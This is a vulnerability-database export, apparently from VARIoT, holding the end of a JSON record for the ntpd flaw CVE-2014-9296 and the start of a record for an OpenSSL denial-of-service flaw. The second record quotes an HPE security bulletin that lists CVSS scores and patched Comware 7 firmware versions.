        "db": "PACKETSTORM",
        "id": "129716"
      },
      {
        "db": "PACKETSTORM",
        "id": "129793"
      },
      {
        "db": "PACKETSTORM",
        "id": "130481"
      },
      {
        "db": "PACKETSTORM",
        "id": "129686"
      },
      {
        "db": "PACKETSTORM",
        "id": "131356"
      },
      {
        "db": "PACKETSTORM",
        "id": "129711"
      },
      {
        "db": "PACKETSTORM",
        "id": "129680"
      },
      {
        "db": "PACKETSTORM",
        "id": "133517"
      },
      {
        "db": "PACKETSTORM",
        "id": "129684"
      },
      {
        "db": "PACKETSTORM",
        "id": "129723"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201412-457"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-9296"
      }
    ]
  },
  "id": "VAR-201412-0612",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.37128115
  },
  "last_update_date": "2024-07-23T20:58:12.108000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "ntp-4.2.8",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=52921"
      },
      {
        "title": "Red Hat: Important: ntp security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20142024 - security advisory"
      },
      {
        "title": "Red Hat: Important: ntp security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20150104 - security advisory"
      },
      {
        "title": "Red Hat: CVE-2014-9296",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2014-9296"
      },
      {
        "title": "Debian CVElist Bug Report Logs: ntp: CVE-2014-9293 CVE-2014-9294 CVE-2014-9295 CVE-2014-9296",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=1bb105aaeb75e38cf89e5f63d6e49db9"
      },
      {
        "title": "Ubuntu Security Notice: ntp vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2449-1"
      },
      {
        "title": "Debian Security Advisories: DSA-3108-1 ntp -- security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=d5c63d464b27e49c6a53057fab75a16d"
      },
      {
        "title": "Amazon Linux AMI: ALAS-2014-462",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2014-462"
      },
      {
        "title": "Tenable Security Advisories: [R3] Tenable Appliance Affected by NTP Vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2015-01"
      },
      {
        "title": "Citrix Security Bulletins: Citrix Security Advisory for NTP Vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=citrix_security_bulletins\u0026qid=e9432b762bf2c2945bfb43af8d6842d5"
      },
      {
        "title": "Oracle: Oracle Critical Patch Update Advisory - October 2016",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=05aabe19d38058b7814ef5514aab4c0c"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2014-9296"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201412-457"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-17",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2014-9296"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.9,
        "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20141222-ntpd"
      },
      {
        "trust": 2.7,
        "url": "http://support.ntp.org/bin/view/main/securitynotice"
      },
      {
        "trust": 2.1,
        "url": "http://www.kb.cert.org/vuls/id/852879"
      },
      {
        "trust": 2.0,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html"
      },
      {
        "trust": 1.8,
        "url": "http://advisories.mageia.org/mgasa-2014-0541.html"
      },
      {
        "trust": 1.7,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1176040"
      },
      {
        "trust": 1.7,
        "url": "http://bk1.ntp.org/ntp-dev/?page=patch\u0026rev=548ad06fexhk1hlzoy-wzvyynwvwag"
      },
      {
        "trust": 1.7,
        "url": "http://bugs.ntp.org/show_bug.cgi?id=2670"
      },
      {
        "trust": 1.7,
        "url": "http://rhn.redhat.com/errata/rhsa-2015-0104.html"
      },
      {
        "trust": 1.7,
        "url": "http://marc.info/?l=bugtraq\u0026m=142590659431171\u0026w=2"
      },
      {
        "trust": 1.7,
        "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:003"
      },
      {
        "trust": 1.7,
        "url": "http://marc.info/?l=bugtraq\u0026m=142853370924302\u0026w=2"
      },
      {
        "trust": 1.7,
        "url": "http://marc.info/?l=bugtraq\u0026m=144182594518755\u0026w=2"
      },
      {
        "trust": 1.7,
        "url": "http://www.securityfocus.com/bid/71758"
      },
      {
        "trust": 1.7,
        "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04790232"
      },
      {
        "trust": 1.7,
        "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10103"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/62209"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2014-12/msg00020.html"
      },
      {
        "trust": 1.7,
        "url": "https://www.arista.com/en/support/advisories-notices/security-advisories/1047-security-advisory-8"
      },
      {
        "trust": 1.6,
        "url": "http://lists.ntp.org/pipermail/announce/2014-december/000122.html"
      },
      {
        "trust": 1.1,
        "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-353-01"
      },
      {
        "trust": 1.0,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9294"
      },
      {
        "trust": 1.0,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9295"
      },
      {
        "trust": 1.0,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9293"
      },
      {
        "trust": 1.0,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9296"
      },
      {
        "trust": 0.9,
        "url": "https://rhn.redhat.com/errata/rhsa-2014-2024.html"
      },
      {
        "trust": 0.8,
        "url": "http://support.ntp.org/bin/view/support/accessrestrictions#section_6.5.2"
      },
      {
        "trust": 0.8,
        "url": "http://www.ntp.org/downloads.html"
      },
      {
        "trust": 0.8,
        "url": "http://www.ntp.org/ntpfaq/ntp-s-algo-crypt.htm"
      },
      {
        "trust": 0.8,
        "url": "http://googleprojectzero.blogspot.com/2015/01/finding-and-exploiting-ntpd.html"
      },
      {
        "trust": 0.8,
        "url": "https://support.apple.com/en-us/ht6601"
      },
      {
        "trust": 0.8,
        "url": "https://support.f5.com/kb/en-us/solutions/public/15000/900/sol15936.html"
      },
      {
        "trust": 0.8,
        "url": "https://www.freebsd.org/security/advisories/freebsd-sa-15:07.ntp.asc"
      },
      {
        "trust": 0.3,
        "url": "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_ntp"
      },
      {
        "trust": 0.3,
        "url": "http://www.ntp.org/"
      },
      {
        "trust": 0.3,
        "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10663\u0026cat=sirt_1\u0026actp=list"
      },
      {
        "trust": 0.3,
        "url": "http://www.huawei.com/en/security/psirt/security-bulletins/security-notices/archive/hw-408044.htm"
      },
      {
        "trust": 0.3,
        "url": "http://support.citrix.com/article/ctx200355"
      },
      {
        "trust": 0.3,
        "url": "http://seclists.org/bugtraq/2015/jan/att-97/esa-2015-004.txt"
      },
      {
        "trust": 0.3,
        "url": "https://www.freebsd.org/security/advisories/freebsd-sa-14:31.ntp.asc"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04582466"
      },
      {
        "trust": 0.3,
        "url": "http://seclists.org/bugtraq/2015/sep/41"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04554677"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21696755"
      },
      {
        "trust": 0.3,
        "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-353-01a"
      },
      {
        "trust": 0.3,
        "url": "https://downloads.avaya.com/css/p8/documents/101006440"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022036"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21696812"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1020645"
      },
      {
        "trust": 0.3,
        "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097490"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21966675"
      },
      {
        "trust": 0.3,
        "url": "http://www.hitachi.co.jp/products/it/server/security/global/info/vulnerable/ntpd_cve-2014-9293.html"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/"
      },
      {
        "trust": 0.3,
        "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2014-9296"
      },
      {
        "trust": 0.2,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/"
      },
      {
        "trust": 0.2,
        "url": "https://www.hp.com/go/swa"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9297"
      },
      {
        "trust": 0.2,
        "url": "http://www.debian.org/security/"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/17.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2014:2024"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/2449-1/"
      },
      {
        "trust": 0.1,
        "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-353-01c"
      },
      {
        "trust": 0.1,
        "url": "https://www.freebsd.org/handbook/makeworld.html\u003e."
      },
      {
        "trust": 0.1,
        "url": "https://security.freebsd.org/\u003e."
      },
      {
        "trust": 0.1,
        "url": "https://security.freebsd.org/advisories/freebsd-sa-14:31.ntp.asc\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://security.freebsd.org/patches/sa-14:31/ntp.patch.asc"
      },
      {
        "trust": 0.1,
        "url": "https://security.freebsd.org/patches/sa-14:31/ntp.patch"
      },
      {
        "trust": 0.1,
        "url": "https://svnweb.freebsd.org/base?view=revision\u0026revision=nnnnnn\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9294\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9296\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://www.kb.cert.org/vuls/id/852879\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9293\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9295\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9294"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9296"
      },
      {
        "trust": 0.1,
        "url": "http://www.mandriva.com/en/support/security/"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9293"
      },
      {
        "trust": 0.1,
        "url": "http://www.mandriva.com/en/support/security/advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9295"
      },
      {
        "trust": 0.1,
        "url": "https://h20392.www2.hp.com/portal/sw"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2014-9295"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2014-9294"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2014-9293"
      },
      {
        "trust": 0.1,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.1,
        "url": "http://h20565.www2.hp.com/portal/site/hpsc?"
      },
      {
        "trust": 0.1,
        "url": "https://h20392.www2.hp.com/portal/swdepot/displayproductinfo.do?productnumber"
      },
      {
        "trust": 0.1,
        "url": "http://www.debian.org/security/faq"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5211"
      },
      {
        "trust": 0.1,
        "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu2.14.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p3+dfsg-1ubuntu3.2"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu2.14.10.1"
      },
      {
        "trust": 0.1,
        "url": "http://www.ubuntu.com/usn/usn-2449-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.4p8+dfsg-1ubuntu2.2"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-9294"
      },
      {
        "trust": 0.1,
        "url": "http://creativecommons.org/licenses/by-sa/2.5"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-9296"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-9295"
      },
      {
        "trust": 0.1,
        "url": "http://security.gentoo.org/glsa/glsa-201412-34.xml"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-9293"
      },
      {
        "trust": 0.1,
        "url": "http://security.gentoo.org/"
      },
      {
        "trust": 0.1,
        "url": "https://bugs.gentoo.org."
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#852879"
      },
      {
        "db": "VULMON",
        "id": "CVE-2014-9296"
      },
      {
        "db": "BID",
        "id": "71758"
      },
      {
        "db": "PACKETSTORM",
        "id": "129716"
      },
      {
        "db": "PACKETSTORM",
        "id": "129793"
      },
      {
        "db": "PACKETSTORM",
        "id": "130481"
      },
      {
        "db": "PACKETSTORM",
        "id": "129686"
      },
      {
        "db": "PACKETSTORM",
        "id": "131356"
      },
      {
        "db": "PACKETSTORM",
        "id": "129711"
      },
      {
        "db": "PACKETSTORM",
        "id": "129680"
      },
      {
        "db": "PACKETSTORM",
        "id": "133517"
      },
      {
        "db": "PACKETSTORM",
        "id": "129684"
      },
      {
        "db": "PACKETSTORM",
        "id": "129723"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201412-457"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-9296"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#852879"
      },
      {
        "db": "VULMON",
        "id": "CVE-2014-9296"
      },
      {
        "db": "BID",
        "id": "71758"
      },
      {
        "db": "PACKETSTORM",
        "id": "129716"
      },
      {
        "db": "PACKETSTORM",
        "id": "129793"
      },
      {
        "db": "PACKETSTORM",
        "id": "130481"
      },
      {
        "db": "PACKETSTORM",
        "id": "129686"
      },
      {
        "db": "PACKETSTORM",
        "id": "131356"
      },
      {
        "db": "PACKETSTORM",
        "id": "129711"
      },
      {
        "db": "PACKETSTORM",
        "id": "129680"
      },
      {
        "db": "PACKETSTORM",
        "id": "133517"
      },
      {
        "db": "PACKETSTORM",
        "id": "129684"
      },
      {
        "db": "PACKETSTORM",
        "id": "129723"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201412-457"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-9296"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-12-19T00:00:00",
        "db": "CERT/CC",
        "id": "VU#852879"
      },
      {
        "date": "2014-12-20T00:00:00",
        "db": "VULMON",
        "id": "CVE-2014-9296"
      },
      {
        "date": "2014-12-19T00:00:00",
        "db": "BID",
        "id": "71758"
      },
      {
        "date": "2014-12-24T16:34:30",
        "db": "PACKETSTORM",
        "id": "129716"
      },
      {
        "date": "2015-01-05T16:17:48",
        "db": "PACKETSTORM",
        "id": "129793"
      },
      {
        "date": "2015-02-19T19:22:00",
        "db": "PACKETSTORM",
        "id": "130481"
      },
      {
        "date": "2014-12-22T17:16:27",
        "db": "PACKETSTORM",
        "id": "129686"
      },
      {
        "date": "2015-04-09T16:21:15",
        "db": "PACKETSTORM",
        "id": "131356"
      },
      {
        "date": "2014-12-24T16:25:31",
        "db": "PACKETSTORM",
        "id": "129711"
      },
      {
        "date": "2014-12-22T17:15:01",
        "db": "PACKETSTORM",
        "id": "129680"
      },
      {
        "date": "2015-09-10T00:10:00",
        "db": "PACKETSTORM",
        "id": "133517"
      },
      {
        "date": "2014-12-22T17:16:05",
        "db": "PACKETSTORM",
        "id": "129684"
      },
      {
        "date": "2014-12-26T15:46:55",
        "db": "PACKETSTORM",
        "id": "129723"
      },
      {
        "date": "2014-12-22T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201412-457"
      },
      {
        "date": "2014-12-20T02:59:03.837000",
        "db": "NVD",
        "id": "CVE-2014-9296"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2015-10-27T00:00:00",
        "db": "CERT/CC",
        "id": "VU#852879"
      },
      {
        "date": "2021-11-17T00:00:00",
        "db": "VULMON",
        "id": "CVE-2014-9296"
      },
      {
        "date": "2016-10-26T08:13:00",
        "db": "BID",
        "id": "71758"
      },
      {
        "date": "2021-11-08T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201412-457"
      },
      {
        "date": "2021-11-17T22:15:39.130000",
        "db": "NVD",
        "id": "CVE-2014-9296"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "129716"
      },
      {
        "db": "PACKETSTORM",
        "id": "129793"
      },
      {
        "db": "PACKETSTORM",
        "id": "129711"
      },
      {
        "db": "PACKETSTORM",
        "id": "129684"
      },
      {
        "db": "PACKETSTORM",
        "id": "129723"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201412-457"
      }
    ],
    "trust": 1.1
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "NTP Project Network Time Protocol daemon (ntpd) contains multiple vulnerabilities (Updated)",
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#852879"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "code problem",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201412-457"
      }
    ],
    "trust": 0.6
  }
}

VAR-201605-0079

Vulnerability from variot - Updated: 2024-07-23 20:50

The asn1_d2i_read_bio function in crypto/asn1/a_d2i_fp.c in the ASN.1 BIO implementation in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h allows remote attackers to cause a denial of service (memory consumption) via a short invalid encoding. OpenSSL is prone to a local denial-of-service vulnerability. An attacker may exploit this issue to crash the application or consume excessive amount of data, resulting in denial-of-service conditions. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

Note: the current version of the following document is available here: https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03756en_us

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: hpesbhf03756en_us Version: 1

HPESBHF03756 rev.1 - HPE Network Products including Comware 7, iMC, and VCX running OpenSSL, Remote Denial of Service (DoS), Disclosure of Sensitive Information

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2017-06-05 Last Updated: 2017-06-05

Potential Security Impact: Remote: Denial of Service (DoS), Disclosure of Sensitive Information

Source: Hewlett Packard Enterprise, Product Security Response Team

VULNERABILITY SUMMARY Potential security vulnerabilities with OpenSSL have been addressed for HPE network products including Comware 7, iMC, and VCX. The vulnerabilities could be remotely exploited resulting in Denial of Service (DoS) or disclosure of sensitive information.

References:

CVE-2016-2105 - Remote Denial of Service (DoS)
CVE-2016-2106 - Remote Denial of Service (DoS)
CVE-2016-2107 - Remote disclosure of sensitive information
CVE-2016-2108 - Remote Denial of Service (DoS)
CVE-2016-2109 - Remote Denial of Service (DoS)
CVE-2016-2176 - Remote Denial of Service (DoS)

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

VCX Products All versions - Please refer to the RESOLUTION below for a list of updated products.
Comware v7 (CW7) Products All versions - Please refer to the RESOLUTION below for a list of updated products.
HP Intelligent Management Center (iMC) All versions - Please refer to the RESOLUTION below for a list of updated products.

BACKGROUND

CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector

CVE-2016-2105
  5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
  5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)

CVE-2016-2106
  5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
  5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)

CVE-2016-2107
  3.7 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
  2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N)

CVE-2016-2108
  9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)

CVE-2016-2109
  7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
  7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)

CVE-2016-2176
  6.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L
  6.4 (AV:N/AC:L/Au:N/C:P/I:N/A:P)

Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:

https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499

RESOLUTION

HPE has made the following software updates available to resolve the vulnerabilities in the Comware 7, iMC and VCX products running OpenSSL.

COMWARE 7 Products

12500 (Comware 7) - Version: R7377P02
- HP Network Products
- JC072B HP 12500 Main Processing Unit
- JC085A HP A12518 Switch Chassis
- JC086A HP A12508 Switch Chassis
- JC652A HP 12508 DC Switch Chassis
- JC653A HP 12518 DC Switch Chassis
- JC654A HP 12504 AC Switch Chassis
- JC655A HP 12504 DC Switch Chassis
- JF430A HP A12518 Switch Chassis
- JF430B HP 12518 Switch Chassis
- JF430C HP 12518 AC Switch Chassis
- JF431A HP A12508 Switch Chassis
- JF431B HP 12508 Switch Chassis
- JF431C HP 12508 AC Switch Chassis
- JG497A HP 12500 MPU w/Comware V7 OS
- JG782A HP FF 12508E AC Switch Chassis
- JG783A HP FF 12508E DC Switch Chassis
- JG784A HP FF 12518E AC Switch Chassis
- JG785A HP FF 12518E DC Switch Chassis
- JG802A HP FF 12500E MPU
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
10500 (Comware 7) - Version: R7184
- HP Network Products
- JC611A HP 10508-V Switch Chassis
- JC612A HP 10508 Switch Chassis
- JC613A HP 10504 Switch Chassis
- JC748A HP 10512 Switch Chassis
- JG608A HP FlexFabric 11908-V Switch Chassis
- JG609A HP FlexFabric 11900 Main Processing Unit
- JG820A HP 10504 TAA Switch Chassis
- JG821A HP 10508 TAA Switch Chassis
- JG822A HP 10508-V TAA Switch Chassis
- JG823A HP 10512 TAA Switch Chassis
- JG496A HP 10500 Type A MPU w/Comware v7 OS
- JH198A HP 10500 Type D Main Processing Unit with Comware v7 Operating System
- JH206A HP 10500 Type D TAA-compliant with Comware v7 Operating System Main Processing Unit
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
5900/5920 (Comware 7) - Version: R2422P02
- HP Network Products
- JC772A HP 5900AF-48XG-4QSFP+ Switch
- JG296A HP 5920AF-24XG Switch
- JG336A HP 5900AF-48XGT-4QSFP+ Switch
- JG510A HP 5900AF-48G-4XG-2QSFP+ Switch
- JG554A HP 5900AF-48XG-4QSFP+ TAA Switch
- JG555A HP 5920AF-24XG TAA Switch
- JG838A HP FF 5900CP-48XG-4QSFP+ Switch
- JH036A HP FlexFabric 5900CP 48XG 4QSFP+ TAA-Compliant
- JH037A HP 5900AF 48XGT 4QSFP+ TAA-Compliant Switch
- JH038A HP 5900AF 48G 4XG 2QSFP+ TAA-Compliant
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
MSR1000 (Comware 7) - Version: R0306P52
- HP Network Products
- JG875A HP MSR1002-4 AC Router
- JH060A HP MSR1003-8S AC Router
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
MSR2000 (Comware 7) - Version: R0306P52
- HP Network Products
- JG411A HP MSR2003 AC Router
- JG734A HP MSR2004-24 AC Router
- JG735A HP MSR2004-48 Router
- JG866A HP MSR2003 TAA-compliant AC Router
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
MSR3000 (Comware 7) - Version: R0306P52
- HP Network Products
- JG404A HP MSR3064 Router
- JG405A HP MSR3044 Router
- JG406A HP MSR3024 AC Router
- JG407A HP MSR3024 DC Router
- JG408A HP MSR3024 PoE Router
- JG409A HP MSR3012 AC Router
- JG410A HP MSR3012 DC Router
- JG861A HP MSR3024 TAA-compliant AC Router
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
MSR4000 (Comware 7) - Version: R0306P52
- HP Network Products
- JG402A HP MSR4080 Router Chassis
- JG403A HP MSR4060 Router Chassis
- JG412A HP MSR4000 MPU-100 Main Processing Unit
- JG869A HP MSR4000 TAA-compliant MPU-100 Main Processing Unit
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
VSR (Comware 7) - Version: E0324
- HP Network Products
- JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation Software
- JG811AAE HP VSR1001 Comware 7 Virtual Services Router
- JG812AAE HP VSR1004 Comware 7 Virtual Services Router
- JG813AAE HP VSR1008 Comware 7 Virtual Services Router
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
